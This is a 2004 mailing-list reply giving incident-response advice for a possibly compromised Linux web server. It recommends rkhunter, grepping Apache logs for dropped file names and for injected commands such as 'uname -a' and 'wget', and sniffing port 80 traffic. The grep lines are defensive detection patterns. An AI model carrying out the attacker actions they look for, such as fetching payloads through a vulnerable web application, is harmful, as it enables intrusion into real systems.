On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
> "Wipe, install, set up chkrootkit and run it often."
> I've already done that. There was no rootkit.
>
An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.net or Google
easily.
[snip]
> I need to find the vulnerable code on this box. And I have no idea
> where to begin.
> I've tried running virus scans, nothing is infected.
>
>
[snip]
The files you found within /tmp - Grep Apache's access /and/ error logs
for these file names. Other common things to grep for include the use of
"uname -a", "ls -l", "wget", remembering you may need to substitue a
space for %20:
# grep -i 'uname%20-a' {access,error}.log
# grep -i 'wget' {access,error}.log
How about running a packet sniffer on port 80 too and monitor the
traffic. Log to a text file and grep that?
HTH.
David.
--
.''`. David Ramsden <david@hexstream.eu.org>
: :' : http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
`- Debian - when you have better things to do than to fix a system.
Attachment:
pgpAcDcKw6kGR.pgp
Description: PGP signature